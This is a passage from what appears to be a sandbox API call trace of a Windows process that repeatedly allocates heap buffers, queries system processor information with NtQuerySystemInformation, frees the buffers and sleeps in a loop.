Flags=0x0, Size=0x30) returned 0x295d5c8 [0304.489] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0304.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0304.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.490] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0304.490] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0304.490] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0304.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0304.491] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0304.491] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.491] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.491] Sleep (dwMilliseconds=0x110) [0304.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.497] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.497] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0304.497] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0304.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0304.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0304.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0304.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.498] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0304.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.499] Sleep (dwMilliseconds=0x110) [0304.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0304.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0304.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0304.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0304.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0304.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0304.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0304.520] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0304.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.520] Sleep (dwMilliseconds=0x110) [0304.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0304.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0304.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0304.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0304.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0304.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0304.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0304.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0304.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.534] Sleep (dwMilliseconds=0x110) [0304.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0304.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0304.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0304.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0304.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0304.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0304.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0304.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0304.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.549] Sleep (dwMilliseconds=0x110) [0304.560] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0304.560] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0304.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0304.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0304.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0304.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.561] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0304.561] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0304.561] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0304.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.562] Sleep (dwMilliseconds=0x110) [0304.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0304.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.579] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0304.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0304.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0304.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0304.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0304.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0304.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0304.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.581] Sleep (dwMilliseconds=0x110) [0304.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0304.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0304.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0304.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0304.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0304.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0304.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0304.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0304.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.597] Sleep (dwMilliseconds=0x110) [0304.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0304.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0304.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0304.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0304.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0304.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0304.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.613] Sleep (dwMilliseconds=0x110) [0304.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0304.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0304.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0304.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0304.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0304.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0304.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0304.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0304.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.627] Sleep (dwMilliseconds=0x110) [0304.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0304.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0304.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0304.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0304.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0304.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0304.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0304.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0304.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.643] Sleep (dwMilliseconds=0x110) [0304.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0304.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.669] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0304.669] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0304.669] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0304.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0304.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.670] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0304.670] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0304.670] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.671] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0304.671] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.672] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.672] Sleep (dwMilliseconds=0x110) [0304.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0304.685] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0304.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0304.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0304.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0304.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0304.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0304.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0304.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0304.688] Sleep (dwMilliseconds=0x110) [0304.700] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0304.700] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0304.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0304.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.701] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0304.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0304.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0304.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0304.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0304.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0304.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0304.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0304.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, 